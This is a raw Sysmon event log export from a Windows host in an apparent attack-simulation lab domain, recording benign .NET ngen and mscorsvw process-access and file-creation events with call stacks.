13:50:19.853{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E603-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:19.790{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1224-0\PresentationFramework-SystemCore.dll2021-01-18 13:50:19.790 10341000x80000000000000008148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.665{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.665{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.306{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E403-00000000A301}3808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.290{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E403-00000000A301}3808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.290{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E403-00000000A301}3808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:19.197{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1320-0\PresentationBuildTasks.dll2021-01-18 13:50:19.197 10341000x80000000000000008183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.759{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.759{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EE03-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.681{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EE03-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.681{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EE03-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:20.618{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\2ec-0\PresentationFramework-SystemXmlLinq.dll2021-01-18 13:50:20.618 10341000x80000000000000008176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.572{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.556{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.556{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.509{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EC03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.509{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EC03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.509{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EC03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:20.447{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9e4-0\PresentationFramework-SystemXml.dll2021-01-18 13:50:20.447 10341000x80000000000000008169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.368{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.368{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\W